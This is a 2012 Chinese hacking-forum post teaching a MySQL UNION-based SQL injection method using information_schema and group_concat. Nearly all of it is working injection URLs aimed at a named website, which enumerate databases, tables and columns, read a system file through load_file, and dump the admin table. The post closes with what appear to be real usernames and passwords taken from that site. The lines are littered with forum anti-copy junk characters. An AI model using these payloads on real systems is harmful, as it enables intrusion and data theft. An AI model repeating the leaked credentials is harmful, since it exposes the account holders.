找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2270|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似# d: v: ]1 H8 B, [1 P" t
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
9 @4 v4 f& H- W6 S
3 o! n6 I( Y9 w+ f$ `. s6 W2 j6 I0 ?5 [8 o' k+ W7 G: H
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入4 `" j1 P) o: s+ P
, D- e" Z. C7 c5 r: v
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢.../ @$ Q# G& m4 L+ y
" w! k6 k: g3 ]" H$ k& _* \! i
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
! [3 x9 _! T4 I& R% n8 T在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等9 W3 N7 f3 F0 ?+ x$ n
3 o6 b) q# P5 i# J) n% m- e
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17  f9 y+ v& D' n* F2 Z

/ B" f4 w! N. m- c1 B0 u% }读出所有库:, W2 v  Y! L5 v/ H5 I6 ]$ T
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA; j- T  a/ F. e4 r0 _

8 Y5 O0 p# {1 F3 Q0 T6 |6 a4 x  {/ P0 R4 v
$ i3 ^1 f4 u1 A! c7 v6 F3 J
读出所有表:
" u' j) n& {, fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
5 l1 V6 m/ `1 v/ k4 X3 G+ X: o
' B' i! r# K" e; S7 F( [7 W读出所有表字段:
+ q* K& F9 T9 \7 r( p. w6 xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)1 M* I0 ]8 A$ L" g$ T, N# N) p) G. |
*/ (97,100,109,105,110)为admin的ascii码 依次类推
" A$ n# b1 J& i& @
1 y" S  I+ v2 S9 F读出所有表字段里的内容:
4 s/ d: M* T! ~, p" i; H( V' zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
0 B+ C/ O, [/ `6 K, Q8 n, M6 y: u2 p! R! C
) F# f7 Z3 F7 W4 L

. Q7 N  J9 L' h. g- s
' s3 H! M7 T$ D+ S3 C6 m  a  h9 U" u" f% P; a' U/ y9 L0 n1 ~% Q, w
0 y, g2 v1 T, h7 y; q
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
) `1 [6 }3 M% q/ Z
/ R9 b+ a; {6 y2 V" w
* R3 P5 ?9 v, m8 h9 U+ dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23+ w3 `  s- P+ I9 v+ I+ r

, b6 X1 D, @" {  C9 X$ [http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
% v1 s& Q7 T" W* K8 G$ P! v: J
" x; J0 }" ?5 U+ d& k6 \, t: c
1 f( ?5 T! }+ {+ N1 F0 }: D) f! F: ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23" E' n  o$ r% b- P

+ V  C/ k* |5 s- @
, [( D; F) X' ^: ^, g# o        webmaster:dzb521123,simlab:simadmin20043233' X3 z% |) R% E! G. Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表